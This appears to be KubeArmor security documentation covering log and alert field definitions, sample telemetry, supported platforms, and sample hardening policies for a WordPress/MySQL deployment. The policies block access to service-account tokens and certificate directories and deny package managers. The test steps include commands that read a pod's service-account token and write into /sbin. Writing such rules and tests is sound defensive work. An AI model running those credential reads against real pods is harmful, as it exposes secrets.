ContainerImage: shows the image that was used to spin up the container (example: docker.io/accuknox/knoxautopolicy:v0.9@sha256:bb83b5c6d41e0d0aa3b5d6621188c284ea)
ContainerName: specifies the container name where the log got generated (example: discovery-engine)
Data: shows the system call that was invoked for this operation (example: syscall=SYS_OPENAT fd=-100 flags=O_RDWR|O_CREAT|O_NOFOLLOW|O_CLOEXEC)
HostName: shows the node name where the log got generated (example: aks-agentpool-16128849-vmss000001)
HostPID: gives the host process ID (example: 967872)
HostPPID: lists the host parent process ID (example: 967496)
Labels: shows the pod label from where the log was generated (example: app=discovery-engine)
Message: gives the message specified in the policy (example: Alert! Execution of package management process inside container is denied)
NamespaceName: lists the namespace where the pod is running (example: accuknox-agents)
PID: lists the process ID running in the container (example: 1)
PPID: lists the parent process ID running in the container (example: 967496)
ParentProcessName: gives the parent process name from where the operation happened (example: /usr/bin/containerd-shim-runc-v2)
PodName: lists the pod name where the log got generated (example: mysql-76ddc6ddc4-h47hv)
ProcessName: specifies the process that performed the operation inside the pod for this log (example: /knoxAutoPolicy)
Resource: lists the resource that was requested (example: //accuknox-obs.db)
Result: shows whether the event was allowed or denied (example: Passed)
Source: lists the source from where the operation request came (example: /knoxAutoPolicy)
Type: specifies it as a container log (example: ContainerLog)
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000000",
"NamespaceName": "default",
"PodName": "vault-0",
"Labels": "app.kubernetes.io/instance=vault,app.kubernetes.io/name=vault,component=server,helm.sh/chart=vault-0.24.1,statefulset.kubernetes.io/pod-name=vault-0",
"ContainerID": "775fb27125ee8d9e2f34d6731fbf3bf677a1038f79fe8134856337612007d9ae",
"ContainerName": "vault",
"ContainerImage": "docker.io/hashicorp/vault:1.13.1@sha256:b888abc3fc0529550d4a6c87884419e86b8cb736fe556e3e717a6bc50888b3b8",
"ParentProcessName": "/usr/bin/runc",
"ProcessName": "/bin/sh",
"HostPPID": 2514065,
"HostPID": 2514068,
"PPID": 2514065,
"PID": 3552620,
"UID": 100,
"Type": "ContainerLog",
"Source": "/usr/bin/runc",
"Operation": "Process",
"Resource": "/bin/sh -ec vault status -tls-skip-verify",
"Data": "syscall=SYS_EXECVE",
"Result": "Passed"
}
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000000",
"NamespaceName": "accuknox-agents",
"PodName": "discovery-engine-6f5c4df7b4-q8zbc",
"Labels": "app=discovery-engine",
"ContainerID": "7aca8d52d35ab7872df6a454ca32339386be755d9ed6bd6bf7b37ec6aaf277e4",
"ContainerName": "discovery-engine",
"ContainerImage": "docker.io/accuknox/knoxautopolicy:v0.9@sha256:bb83b5c6d41e0d0aa3b5d6621188c284ea99741c3692e34b0f089b0e74745413",
"ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
"ProcessName": "/knoxAutoPolicy",
"HostPPID": 967496,
"HostPID": 967872,
"PPID": 967496,
"PID": 1,
"Type": "ContainerLog",
"Source": "/knoxAutoPolicy",
"Operation": "File",
"Resource": "/var/run/secrets/kubernetes.io/serviceaccount/token",
"Data": "syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC",
"Result": "Passed"
}
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000001",
"NamespaceName": "accuknox-agents",
"PodName": "policy-enforcement-agent-7946b64dfb-f4lgv",
"Labels": "app=policy-enforcement-agent",
"ContainerID": "b597629c9b59304c779c51839e9a590fa96871bdfdf55bfec73b26c9fb7647d7",
"ContainerName": "policy-enforcement-agent",
"ContainerImage": "public.ecr.aws/k9v9d5v2/policy-enforcement-agent:v0.1.0@sha256:005c1fde3ff8a667f3ac7540c5c011c752a7e3aaa2c89aa335703289ed8d80f8",
"ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
"ProcessName": "/home/pea/main",
"HostPPID": 1394403,
"HostPID": 1394554,
"PPID": 1394403,
"PID": 1,
"Type": "ContainerLog",
"Source": "./main",
"Operation": "Network",
"Resource": "sa_family=AF_INET sin_port=53 sin_addr=10.0.0.10",
"Data": "syscall=SYS_CONNECT fd=10",
"Result": "Passed"
}
Action: specifies the action of the policy that was matched (example: Audit/Block)
ClusterName: gives information about the cluster for which the alert was generated (example: aks-test-cluster)
Operation: gives details about what type of operation happened in the pod (example: File/Process/Network)
ContainerID: information about the container ID where the policy violation or alert got generated (example: e10d5edb62ac2daa4eb9a2146e2f2cfa87b6a5f30bd3a)
ContainerImage: shows the image that was used to spin up the container (example: docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f)
ContainerName: specifies the container name where the alert got generated (example: mysql)
Data: shows the system call that was invoked for this operation (example: syscall=SYS_EXECVE)
Enforcer: specifies the name of the LSM that enforced the policy (example: AppArmor/BPFLSM)
HostName: shows the node name where the alert got generated (example: aks-agentpool-16128849-vmss000001)
HostPID: gives the host process ID (example: 3647533)
HostPPID: lists the host parent process ID (example: 3642706)
Labels: shows the pod label from where the alert was generated (example: app=mysql)
Message: gives the message specified in the policy (example: Alert! Execution of package management process inside container is denied)
NamespaceName: lists the namespace where the pod is running (example: wordpress-mysql)
PID: lists the process ID running in the container (example: 266)
PPID: lists the parent process ID running in the container (example: 251)
ParentProcessName: gives the parent process name from where the operation happened (example: /bin/bash)
PodName: lists the pod name where the alert got generated (example: mysql-76ddc6ddc4-h47hv)
PolicyName: gives the policy that was matched for this alert generation (example: harden-mysql-pkg-mngr-exec)
ProcessName: specifies the process that performed the operation inside the pod for this alert (example: /usr/bin/apt)
Resource: lists the resource that was requested (example: /usr/bin/apt)
Result: shows whether the event was allowed or denied (example: Permission denied)
Severity: gives the severity level of the operation (example: 5)
Source: lists the source from where the operation request came (example: /bin/bash)
Tags: specifies the list of benchmarks this policy satisfies (example: NIST,NIST_800-53_CM-7(4),SI-4,process,NIST_800-53_SI-4)
Timestamp: gives the time at which this event was attempted (example: 1687868507)
Type: shows whether a policy was matched or a default posture alert was raised (example: MatchedPolicy)
UpdatedTime: gives the time of this alert (example: 2023-06-27T12:21:47.932526)
cluster_id: specifies the cluster id where the alert was generated (example: 596)
component_name: gives the component which generated this log/alert (example: kubearmor)
tenant_id: specifies the tenant id where this cluster is onboarded in AccuKnox SaaS (example: 11)
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000001",
"NamespaceName": "wordpress-mysql",
"PodName": "wordpress-787f45786f-2q9wf",
"Labels": "app=wordpress",
"ContainerID": "72de193fc8d849cd052affae5a53a27111bcefb75385635dcb374acdf31a5548",
"ContainerName": "wordpress",
"ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
"HostPPID": 495804,
"HostPID": 495877,
"PPID": 309835,
"PID": 309841,
"ParentProcessName": "/bin/bash",
"ProcessName": "/usr/bin/apt",
"PolicyName": "harden-wordpress-pkg-mngr-exec",
"Severity": "5",
"Tags": "NIST,NIST_800-53_CM-7(4),SI-4,process,NIST_800-53_SI-4",
"ATags": [
"NIST",
"NIST_800-53_CM-7(4)",
"SI-4",
"process",
"NIST_800-53_SI-4"
],
"Message": "Alert! Execution of package management process inside container is denied",
"Type": "MatchedPolicy",
"Source": "/bin/bash",
"Operation": "Process",
"Resource": "/usr/bin/apt",
"Data": "syscall=SYS_EXECVE",
"Enforcer": "AppArmor",
"Action": "Block",
"Result": "Permission denied"
}
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000001",
"NamespaceName": "wordpress-mysql",
"PodName": "wordpress-787f45786f-2q9wf",
"Labels": "app=wordpress",
"ContainerID": "72de193fc8d849cd052affae5a53a27111bcefb75385635dcb374acdf31a5548",
"ContainerName": "wordpress",
"ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
"HostPPID": 495804,
"HostPID": 496390,
"PPID": 309835,
"PID": 309842,
"ParentProcessName": "/bin/bash",
"ProcessName": "/bin/rm",
"PolicyName": "harden-wordpress-file-integrity-monitoring",
"Severity": "1",
"Tags": "NIST,NIST_800-53_AU-2,NIST_800-53_SI-4,MITRE,MITRE_T1036_masquerading,MITRE_T1565_data_manipulation",
"ATags": [
"NIST",
"NIST_800-53_AU-2",
"NIST_800-53_SI-4",
"MITRE",
"MITRE_T1036_masquerading",
"MITRE_T1565_data_manipulation"
],
"Message": "Detected and prevented compromise to File integrity",
"Type": "MatchedPolicy",
"Source": "/bin/rm /sbin/raw",
"Operation": "File",
"Resource": "/sbin/raw",
"Data": "syscall=SYS_UNLINKAT flags=",
"Enforcer": "AppArmor",
"Action": "Block",
"Result": "Permission denied"
}
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000000",
"NamespaceName": "default",
"PodName": "vault-0",
"Labels": "app.kubernetes.io/instance=vault,app.kubernetes.io/name=vault,component=server,helm.sh/chart=vault-0.24.1,statefulset.kubernetes.io/pod-name=vault-0",
"ContainerID": "775fb27125ee8d9e2f34d6731fbf3bf677a1038f79fe8134856337612007d9ae",
"ContainerName": "vault",
"ContainerImage": "docker.io/hashicorp/vault:1.13.1@sha256:b888abc3fc0529550d4a6c87884419e86b8cb736fe556e3e717a6bc50888b3b8",
"HostPPID": 2203523,
"HostPID": 2565259,
"PPID": 2203523,
"PID": 3558570,
"UID": 100,
"ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
"ProcessName": "/bin/vault",
"PolicyName": "ksp-vault-network",
"Severity": "8",
"Type": "MatchedPolicy",
"Source": "/bin/vault status -tls-skip-verify",
"Operation": "Network",
"Resource": "domain=AF_UNIX type=SOCK_STREAM|SOCK_NONBLOCK|SOCK_CLOEXEC protocol=0",
"Data": "syscall=SYS_SOCKET",
"Enforcer": "eBPF Monitor",
"Action": "Audit",
"Result": "Passed"
}
{
"Timestamp": 1692813948,
"UpdatedTime": "2023-08-23T18:05:48.301798Z",
"ClusterName": "default",
"HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
"HostPPID": 1979,
"HostPID": 1787227,
"PPID": 1979,
"PID": 1787227,
"ParentProcessName": "/bin/bash",
"ProcessName": "/bin/sleep",
"PolicyName": "sleep-deny",
"Severity": "5",
"Type": "MatchedHostPolicy",
"Source": "/bin/bash",
"Operation": "Process",
"Resource": "/usr/bin/sleep 10",
"Data": "syscall=SYS_EXECVE",
"Enforcer": "BPFLSM",
"Action": "Block",
"Result": "Permission denied"
}
{
"Timestamp": 1692814089,
"UpdatedTime": "2023-08-23T18:08:09.522743Z",
"ClusterName": "default",
"HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
"HostPPID": 1791315,
"HostPID": 1791316,
"PPID": 1791315,
"PID": 1791316,
"UID": 204,
"ParentProcessName": "/usr/sbin/sshd",
"ProcessName": "/usr/sbin/sshd",
"PolicyName": "DefaultPosture",
"Type": "MatchedHostPolicy",
"Source": "/usr/sbin/sshd",
"Operation": "Syscall",
"Data": "syscall=SYS_SETGID userid=0",
"Enforcer": "BPFLSM",
"Action": "Block",
"Result": "Operation not permitted"
}
{
"Timestamp": 1692814089,
"UpdatedTime": "2023-08-23T18:08:09.523964Z",
"ClusterName": "default",
"HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
"HostPPID": 1791315,
"HostPID": 1791316,
"PPID": 1791315,
"PID": 1791316,
"UID": 204,
"ParentProcessName": "/usr/sbin/sshd",
"ProcessName": "/usr/sbin/sshd",
"PolicyName": "DefaultPosture",
"Type": "MatchedHostPolicy",
"Source": "/usr/sbin/sshd",
"Operation": "Syscall",
"Data": "syscall=SYS_SETUID userid=0",
"Enforcer": "BPFLSM",
"Action": "Block",
"Result": "Operation not permitted"
}
KubeArmor supports the following types of workloads:
K8s orchestrated: Workloads deployed as k8s orchestrated containers. In this case, KubeArmor is deployed as a k8s daemonset. Note that KubeArmor supports policy enforcement on both k8s pods (KubeArmorPolicy) and k8s nodes (KubeArmorHostPolicy).
Containerized: Workloads that are containerized but not k8s orchestrated are also supported. KubeArmor installed in systemd mode can be used to protect such workloads.
VM/Bare-Metal: Workloads deployed on virtual machines or bare metal, i.e., workloads running directly as host/system processes. In this case, KubeArmor is deployed in systemd mode.
Provider
K8s engine
OS Image
Arch
Audit Rules
Blocking Rules
LSM Enforcer
Remarks
Onprem
kubeadm, , , microk8s
x86_64, ARM
✔️
✔️
✔️
✔️
, AppArmor
x86_64
✔️
✔️
✔️
✔️
, AppArmor
All
Ubuntu >= 16.04
x86_64
✔️
✔️
✔️
✔️
, AppArmor
All
Microsoft
Ubuntu >= 18.04
x86_64
✔️
✔️
✔️
✔️
, AppArmor
Oracle
>=7
x86_64
✔️
✔️
✔️
✔️
IBM
Ubuntu
x86_64
✔️
✔️
✔️
✔️
, AppArmor
Talos
Talos
x86_64
✔️
✔️
✔️
✔️
AWS
Amazon Linux 2 (kernel >=5.8)
x86_64
✔️
✔️
✔️
✔️
AWS
Ubuntu
x86_64
✔️
✔️
✔️
✔️
AppArmor
AWS
x86_64
✔️
✔️
✔️
✔️
AWS
x86_64
✔️
✔️
✔️
✔️
AWS
Ubuntu
ARM
✔️
✔️
✔️
✔️
AppArmor
AWS
Amazon Linux 2
ARM
✔️
✔️
❌
✔️
SELinux
RedHat
<=8.4
x86_64
✔️
✔️
❌
✔️
SELinux
RedHat
>=8.5
x86_64
✔️
✔️
✔️
✔️
RedHat
>=9.2
x86_64
✔️
✔️
✔️
✔️
Rancher
x86_64
✔️
✔️
✔️
✔️
, AppArmor
Rancher
x86_64
✔️
✔️
✔️
✔️
, AppArmor
Oracle
ARM
✔️
✔️
❌
✔️
SELinux
VMware
TBD
x86_64
🚧
🚧
🚧
🚧
🚧
Mirantis
Ubuntu>=20.04
x86_64
✔️
✔️
✔️
✔️
AppArmor
Digital Ocean
Debian GNU/Linux 11 (bullseye)
x86_64
✔️
✔️
✔️
✔️
Alibaba Cloud
Alibaba Cloud Linux 3.2104 LTS
x86_64
✔️
✔️
✔️
✔️
The following distributions are tested for VM/Bare-metal based installations:
SUSE | SUSE Enterprise 15 | Full | Full
Debian | / | Full | Full
Ubuntu | 18.04 / 16.04 / 20.04 | Full | Full
RedHat / CentOS | RHEL / CentOS <= 8.4 | Full | Partial
RedHat / CentOS | RHEL / CentOS >= 8.5 | Full | Full
Fedora | Fedora 34 / 35 | Full | Full
Rocky Linux | Rocky Linux >= 8.5 | Full | Full
AWS | Amazon Linux 2022 | Full | Full
AWS | Amazon Linux 2023 | Full | Full
RaspberryPi (ARM) | Debian | Full | Full
ArchLinux | ArchLinux-6.2.1 | Full | Full
Alibaba | Alibaba Cloud Linux 3.2104 LTS 64 bit | Full | Full
Note: Full = supports both enforcement and observability; Partial = supports only observability.
Please reach out to the KubeArmor community on Slack or raise a GitHub issue to express interest in adding support for a platform.
If you have access to a platform not listed above, testing KubeArmor on it would be very much appreciated. Once tested, you can update this document and raise a PR.
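Before raising a request, it is worth checking what your node actually supports. The karmor probe command inspects the cluster or host and reports the available enforcers and KubeArmor's support for the environment; the exact output fields may vary across karmor versions:
# report KubeArmor support and active enforcer on the current environment
karmor probe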
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-wordpress-block-service-account
  namespace: wordpress-mysql
spec:
  severity: 2
  selector:
    matchLabels:
      app: wordpress
  file:
    matchDirectories:
      - dir: /run/secrets/kubernetes.io/serviceaccount/
        recursive: true
  action: Block
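To try this policy, save it to a file (the file name below is arbitrary), apply it, and then attempt to read the service account token from a wordpress pod; the read should now be denied. This sketch assumes the wordpress-mysql sample deployment, where the wordpress pods carry the label app=wordpress:
kubectl apply -f ksp-wordpress-block-service-account.yaml
POD=$(kubectl -n wordpress-mysql get pod -l app=wordpress -o name)
kubectl -n wordpress-mysql exec -it $POD -- cat /run/secrets/kubernetes.io/serviceaccount/token
# expected: cat: ... Permission denied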
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-mysql-file-integrity-monitoring
  namespace: wordpress-mysql
spec:
  action: Block
  file:
    matchDirectories:
      - dir: /sbin/
        readOnly: true
        recursive: true
      - dir: /usr/bin/
        readOnly: true
        recursive: true
      - dir: /usr/lib/
        readOnly: true
        recursive: true
      - dir: /usr/sbin/
        readOnly: true
        recursive: true
      - dir: /bin/
        readOnly: true
        recursive: true
      - dir: /boot/
        readOnly: true
        recursive: true
  message: Detected and prevented compromise to File integrity
  selector:
    matchLabels:
      app: mysql
  severity: 1
  tags:
    - NIST
    - NIST_800-53_AU-2
    - NIST_800-53_SI-4
    - MITRE
    - MITRE_T1036_masquerading
    - MITRE_T1565_data_manipulation
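Because the directories above are marked readOnly, reads keep working while writes are blocked. A quick way to verify this on the mysql pod, assuming the sample deployment where the mysql pods carry the label app=mysql:
POD=$(kubectl -n wordpress-mysql get pod -l app=mysql -o name)
kubectl -n wordpress-mysql exec -it $POD -- touch /sbin/test-file
# expected: Permission denied (the write is blocked, normal reads from /sbin/ still succeed)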
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-mysql-pkg-mngr-exec
  namespace: wordpress-mysql
spec:
  action: Block
  message: Alert! Execution of package management process inside container is denied
  process:
    matchPaths:
      - path: /usr/bin/apt
      - path: /usr/bin/apt-get
      - path: /bin/apt-get
      - path: /sbin/apk
      - path: /bin/apt
      - path: /usr/bin/dpkg
      - path: /bin/dpkg
      - path: /usr/bin/gdebi
      - path: /bin/gdebi
      - path: /usr/bin/make
      - path: /bin/make
      - path: /usr/bin/yum
      - path: /bin/yum
      - path: /usr/bin/rpm
      - path: /bin/rpm
      - path: /usr/bin/dnf
      - path: /bin/dnf
      - path: /usr/bin/pacman
      - path: /usr/sbin/pacman
      - path: /bin/pacman
      - path: /sbin/pacman
      - path: /usr/bin/makepkg
      - path: /usr/sbin/makepkg
      - path: /bin/makepkg
      - path: /sbin/makepkg
      - path: /usr/bin/yaourt
      - path: /usr/sbin/yaourt
      - path: /bin/yaourt
      - path: /sbin/yaourt
      - path: /usr/bin/zypper
      - path: /bin/zypper
  selector:
    matchLabels:
      app: mysql
  severity: 5
  tags:
    - NIST
    - NIST_800-53_CM-7(4)
    - SI-4
    - process
    - NIST_800-53_SI-4
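With this policy applied, invoking any of the listed package managers inside the mysql pod should be denied at exec time, again assuming the sample deployment with label app=mysql:
POD=$(kubectl -n wordpress-mysql get pod -l app=mysql -o name)
kubectl -n wordpress-mysql exec -it $POD -- apt update
# expected: permission denied (and a corresponding Block alert in the KubeArmor telemetry)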
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-mysql-trusted-cert-mod
  namespace: wordpress-mysql
spec:
  action: Block
  file:
    matchDirectories:
      - dir: /etc/ssl/
        readOnly: true
        recursive: true
      - dir: /etc/pki/
        readOnly: true
        recursive: true
      - dir: /usr/local/share/ca-certificates/
        readOnly: true
        recursive: true
  message: Credentials modification denied
  selector:
    matchLabels:
      app: mysql
  severity: 1
  tags:
    - MITRE
    - MITRE_T1552_unsecured_credentials
    - FGT1555
    - FIGHT
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-block-mysql-dir
  namespace: wordpress-mysql
spec:
  message: Alert! Attempt to make changes to database detected
  tags:
    - CIS
    - CIS_Linux
  selector:
    matchLabels:
      app: mysql
  file:
    matchDirectories:
      - dir: /var/lib/mysql/
        ownerOnly: true
        readOnly: true
  severity: 1
  action: Block
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-block-stig-v-81883-restrict-access-to-config-files
  namespace: wordpress-mysql
spec:
  tags:
    - config-files
  message: Alert! configuration files have been accessed
  selector:
    matchLabels:
      app: wordpress
  file:
    matchPatterns:
      - pattern: /**/*.conf
        ownerOnly: true
  action: Block
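All of the policies above are applied with kubectl in the usual way. Once applied, they appear as KubeArmorPolicy objects in the target namespace, and any violations surface in the telemetry shown earlier. A minimal check, assuming the ksp short name registered by the KubeArmorPolicy CRD:
# list the KubeArmor policies active in the wordpress-mysql namespace
kubectl -n wordpress-mysql get kubearmorpolicy
# or, using the short name
kubectl -n wordpress-mysql get ksp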